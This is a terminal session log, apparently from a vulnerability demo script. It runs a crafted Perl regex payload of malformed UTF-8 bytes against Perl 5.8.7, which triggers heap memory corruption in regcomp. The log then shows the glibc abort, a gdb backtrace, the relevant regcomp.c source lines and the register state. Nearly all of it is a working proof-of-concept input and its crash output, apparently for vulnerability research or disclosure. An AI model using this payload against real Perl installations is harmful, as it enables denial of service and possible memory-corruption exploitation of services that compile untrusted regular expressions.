 : user@vapor|0; pwd
/demos/perl
 : user@vapor|0; source ../demos.sh
 : demo@vapor|0; handle_product
00. Unicode Desynchronization 1
01. Unicode Desynchronization 2
select vulnerability: 1

Unicode Desynchronization 2 selected.

payload: $r=chr(0xfc).chr(0xaa).(chr(0x80)x"8")."\\x{100}";/$r/
press enter to run.

[1] 30260
*** glibc detected *** malloc(): memory corruption: 0x0805ffb0 ***
../demos.sh: line 80: 30262 Aborted                 (core dumped) /usr/local/encap/perl-5.8.7/bin/perl -e "$payload"
[1]+  Exit 134                ( eval $cmd )
Core file generated.
Opening gdb ...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so...done.
Loaded symbols for /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libnsl-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libdl.so.2...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libdl-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libdl.so.2
Reading symbols from /lib/tls/i686/cmov/libm.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libm-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libm.so.6
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libcrypt-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /lib/tls/i686/cmov/libutil.so.1...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libutil-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libutil.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...done.
done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `/usr/local/encap/perl-5.8.7/bin/perl -e $r=chr(0xfc).chr(0xaa).(chr(0x80)x"8").'.
Program terminated with signal 6, Aborted.
#0  0xffffe402 in __kernel_vsyscall ()
>>bt
#0  0xffffe402 in __kernel_vsyscall ()
#1  0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0x43b7187a in __libc_message () from /lib/tls/i686/cmov/libc.so.6
#4  0x43b789ac in _int_malloc () from /lib/tls/i686/cmov/libc.so.6
#5  0x43b7a411 in malloc () from /lib/tls/i686/cmov/libc.so.6
#6  0xf7f4f041 in Perl_safesysmalloc (size=0x0) at util.c:78
#7  0xf7f4730e in Perl_pregcomp (exp=0x805a5c0 "\200\200\200\200\200\200\200\200\\x{100}", xend=0x805a5d1 "", pm=0x8054610) at regcomp.c:1865
#8  0xf7f8a9ec in Perl_pp_regcomp () at pp_ctl.c:127
#9  0xf7f4d4cc in Perl_runops_debug () at dump.c:1452
#10 0xf7f045af in perl_run (my_perl=0x804c008) at perl.c:2000
#11 0x080491e2 in main (argc=0x0, argv=0x0, env=0xffffd394) at perlmain.c:98
>>up 6
#6  0xf7f4f041 in Perl_safesysmalloc (size=0x0) at util.c:78
78          ptr = (Malloc_t)PerlMem_malloc(size?size:1);        /* malloc(0) is NASTY on our system */
>>up
#7  0xf7f4730e in Perl_pregcomp (exp=0x805a5c0 "\200\200\200\200\200\200\200\200\\x{100}", xend=0x805a5d1 "", pm=0x8054610) at regcomp.c:1865
1865        Newz(1004, r->substrs, 1, struct reg_substr_data);
>>l
1860            r->reganch |= ROPT_NAUGHTY;
1861        scan = r->program + 1;              /* First BRANCH. */
1862
1863        /* XXXX To minimize changes to RE engine we always allocate
1864           3-units-long substrs field. */
1865        Newz(1004, r->substrs, 1, struct reg_substr_data);
1866
1867        StructCopy(&zero_scan_data, &data, scan_data_t);
1868        /* XXXX Should not we check for something else?  Usually it is OPEN1... */
1869        if (OP(scan) != BRANCH) {           /* Only one top-level choice. */
>>p r->substrs
$1 = (struct reg_substr_data *) 0x0
>>info reg
eax            0x0          0x0
ecx            0x7636       0x7636
edx            0x6          0x6
ebx            0xf7fedd2c   0xf7fedd2c
esp            0xffffcfe0   0xffffcfe0
ebp            0xffffd138   0xffffd138
esi            0x805ff94    0x805ff94
edi            0x1          0x1
eip            0xf7f4730e   0xf7f4730e
eflags         0x10246      [ PF ZF IF RF ]
cs             0x23         0x23
ss             0x2b         0x2b
ds             0x2b         0x2b
es             0x2b         0x2b
fs             0x0          0x0
gs             0x63         0x63
>>quit
 : demo@vapor|0; exit